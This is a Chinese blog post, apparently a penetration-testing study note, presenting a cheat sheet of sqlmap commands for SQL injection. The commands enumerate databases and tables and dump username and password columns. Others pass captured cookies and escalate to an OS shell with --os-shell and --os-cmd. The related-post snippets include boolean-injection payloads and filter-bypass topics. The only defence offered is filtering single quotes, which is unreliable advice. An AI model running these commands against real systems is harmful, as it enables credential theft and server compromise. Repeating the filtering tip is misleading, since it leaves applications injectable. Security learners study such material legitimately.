渗透测试笔记(四)——SQL注入攻击及防御(2)

于 2022-06-06 22:33:27 发布
阅读量476 收藏
点赞数
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67044952/article/details/125155792
版权

SQLmap自动化注入

GET方法注入

 sqlmap -u "URL" -dbms=mysql --batch
 sqlmap -u "URL" --dbs
 sqlmap -u "URL" --users
 sqlmap -u "URL" --current-user
 ​
 # 获得当前数据库
 sqlmap -u "URL" --current-db
 ​
 # 获得数据库表
 sqlmap -u "URL" --batch -p username -D wordpress --tables
 ​
 # 获得表的字段
 sqlmap -u "URL" --batch -p username -D wordpress -T wp_users --columns
 ​
 # 获得表中的数据
 sqlmap -u "URL" --batch -D nowasp -T accounts -C "username, password"

POST方法注入

 # 需要Cookie才能访问的页面
 sqlmap -u "URL" --cookie="COOKIE" --batch
 sqlmap -u "URL" --cookie="COOKIE" --batch -p id

注意:复制cookie的时候要把中间的冒号改为等号

数据获取

 --users
 --current-user
 --dbs
 --current-db
 -D "database_name" --tables
 -D "database_name" -T "table_name" --columns
 --dump-all
 --dump-all --exclude-sysdbs
 -D "database_name" -T "table_name" -C "username,password" --dump

提权操作

 # 与数据库交互
 --sql-shell
 ​
 # 操作系统权限
 --os-shell
 --os-cmd=ls /

综合实例

SQL注入防御

开发人员对输入内容进行单引号的过滤

Replyme
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入攻击防御第二版读书笔记——利用SQL注入
weixin_34072857的博客
09-18 137
获取标志信息 mysql select version(),select @@version mssql select @@version,@@servername,@@language,@@spid postgre select version() 盲跟踪 从字符串推断数据库 mysql select 'so' 'me' mssql select 'so'+'me' o...
SQL注入攻击防御(第2版)_读书笔记2_未完待续
N1nG
07-10 922
SQL错误: 不需要记住所有错误代码,重要的是理解错误发生的时机和原因. ①Microsoft SQL Server错误: 报错:quotation mark before the character string 'attacker;' 猜想:SELECT * FROM products WHERE category='attacker'' 该应用程序未审核单引号,所以数据库服务器拒绝
sql注释符注入防御_Boolean注入攻击
weixin_34547167的博客
12-17 175
0x0测试源代码,同理扔进phpstudy的根目录运行0x01访问测试地址:http://localhost/boolean_inject.php?id=1访问测试页面页面出现yes的字样,在url后面添加一个单引号,效果:出现no响应继续测试id=1' and 1=1%23和 id=1' and 1=2%23id=1' and 1=1%23 id=1' and 1=2%23可以看出页面只返回ye...
SQL 注入原理与防御
todd_qwe的博客
04-21 266
学习SQL注入书单原理危害SQL注入流程分类及常用工具防御实战 书单 《SQL注入攻击防御第2版》 原理 注入攻击的本质,是吧用户输入的数据当做代码执行。这里有两个关键条件,第一个是用户能控制输入;第二个是原本程序要执行的代码,拼接了用户输入的数据。当然,想要研究SQL注入需要深入了解每种数据库SQL语法及特性。 危害 通过SQL注入攻击,可以获取、删除、修改数据库信息,并提供提权来控制we...
SQL 注入的基本防御手段和绕过技术
枫梓林のBlog
04-25 738
SQL 注入的基本防御手段和绕过技术 文章目录SQL 注入的基本防御手段和绕过技术0x01SQL的绕过技术1.大小写绕过2.注释绕过1.1 例1 绕过注释并爆库1.2 例2 使用逻辑运算注入3.双写绕过例1:双写搭配大小写绕过4.关键字等价绕过5.绕过去除空格6.绕过去关键字的绕过例1:大小写绕过例2:双写绕过例3:注释绕过例4:盲注绕过7.MySQL 宽字节绕过8.base 64 编码绕过0x02 二次注入修改其他用户密码0x03 如何防止SQL注入总结 实验环境 Firefox burp suite
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
Python之渗透测试笔记(五) ——Requests模块
12-21
Requests模块Requests模块简介Request模块的7个主要参数Response响应内容定制请求头POST请求cookiesession会话请求与响应 Requests模块简介 request模块是python的第三方库,主要功能如下: Keep-Alive & 连接池 ...
学习笔记——sql.zip
06-08
"学习笔记——sql.zip"这个压缩包文件很可能包含了关于SQL的学习资料,如教程、笔记、示例代码等,旨在帮助用户掌握SQL的基本概念、语法和高级特性。 首先,SQL的基础知识包括数据类型,如整型(INT)、浮点型...
渗透测试学习笔记之案例一.pdf
04-06
渗透测试学习笔记
sql注入攻击的原理(sql注入攻击防范)
热门推荐
weixin_45901902的博客
08-19 2万+
SQL 注入(SQLi)是一种可执行恶意 SQL 语句的注入攻击。这些 SQL 语句可控制网站背后的数据库服务。攻击者可利用 SQL 漏洞绕过网站已有的安全措施。他们可绕过网站的身份认证和授权并访问整个 SQL 数据库的数据。他们也可利用 SQL 注入对数据进行增加、修改和删除操作。 SQL 注入可影响任何使用了 SQL 数据库的网站或应用程序,例如常用的数据库MySQL、Oracle、SQL Server 等等。攻击者利用它,便能无需授权地访问你的敏感数据,比如:用户资料、个人数据、商业机密、知识产
sql注入实例分析
weixin_30624825的博客
07-23 3431
什么是SQL注入攻击?引用百度百科的解释: sql注入_百度百科: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执...
SQL注入问题的研究与防护
m0_52341820的博客
04-14 7964
随着互联网的发展,Web应用程序得到了日益广泛的运用,与此同时黑客技术也得到了发展,Web应用程序的安全漏洞类型越来越多样化,所带来的安全隐患越多。SQL注入漏洞契机利用Web应用程序的安全漏洞进行SQL注入攻击达到绕过身份验证、窃取和破坏数据、伺机非法入侵等目的。本文围绕Web项目中的常见的SQL注入攻击的特点、原理并进行总结,提出在应用程序原有防御基础上使用输入验证、SQL Sever防御以及使用存储过程替代参数化查询相结合的形式构建出一种有效防范 SQL 注入攻击的思路和方法。测试结果......
SQL注入攻击原理及防御策略
HoewDec的博客
02-23 2250
一.什么是SQL注入 SQL注入,一般指web应用程序对用户输入数据的合法性没有校验或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 总的来说就是,攻击者通过系统正常的输入数据的功能,输入恶意数据,而系统又未作任何的校验,直接信任了用户输入,使得恶意输入改变原本的SQL逻辑或者执行了额外的SQL脚本达,从而造成了SQL注入攻击。 二.SQL注入的危害及
系统知识点(一 SQL 注入防御机制)
Aidang的博客
05-08 1022
1.SQL注入理解与应用 要想知道如何进行SQL注入,首先我们就必须知道,到底什么才是SQL注入,通过查询百度百科可以知道: 通过对于这段话的理解,我们同样可以知道,SQL注入产生的很大一部分原因,更多是程序员自身代码编写水平造成的,使得应用程序产生了安全方面的漏洞,例如在编写程序的过程当中,是否对于敏感字符进行了相应过滤,变量是否进行了唯一性的确定等等,而SQL注入正是通过多变的查询数据手法,或...
Sql注入攻击介绍与防护
han_code的博客
05-12 1021
1、什么是sql注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1] 比如先前的很多影视网站泄露VI...
SQL注入分类、防御
BeatRex的博客
06-13 3240
一、SQL注入分类 按数据类型分 数字类型 后台语句可能为: $id=$_POST['id'] select user,password from users where id=$id 字符类型 $id=$_POST['id'] 后台语句可能为:select user,password from users where id='$id' 总结: 数字类型直接将后台接收到用户输入的内容带入到数...
mysql防注入代码_SQL注入之代码层防御
weixin_32002013的博客
01-19 523
[目录]0x0 前言0x1 领域驱动的安全1.1 领域驱动的设计1.2 领域驱动的安全示例0x2 使用参数化查询2.1 参数化查询2.2 Java中的参数化语句2.3 .NET(C#)中的参数化语句2.4 PHP中的参数化语句2.5 PL/SQL中的参数化语句0X3 移动应用中的参数化语句3.1 iOS应用程序中的参数化语句3.2 Android应用程序中的参数化语句3.3 HTML浏览器中存储的...
【渗透攻防Web篇】SQL注入攻击高级
dfdhxb995397的博客
08-21 250
前言前面我们学习了如何寻找,确认,利用SQL注入漏洞的技术,本篇文章我将介绍一些更高级的技术,避开过滤,绕开防御。有攻必有防,当然还要来探讨一下SQL注入防御技巧。目录第五节 避开过滤方法总结 5.1、大小写变种 5.2、URL编码 5.3、SQL注释 5.4、空字节 5.5、二阶SQL注入 第六节 探讨SQL注入防御技巧 6.1、输入验证 6.2、编...
eLearnSecurity eWPT Notes.pdf
最新发布
10-06
2. **实验室模拟**:eWPT课程可能包含模拟环境,让学生通过实际操作演练渗透测试技巧,以便熟悉常见攻击手段和防御策略。 3. **HTTP Cookies和Sessions**:理解如何跟踪和操纵网站的会话cookies是至关重要的,因为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值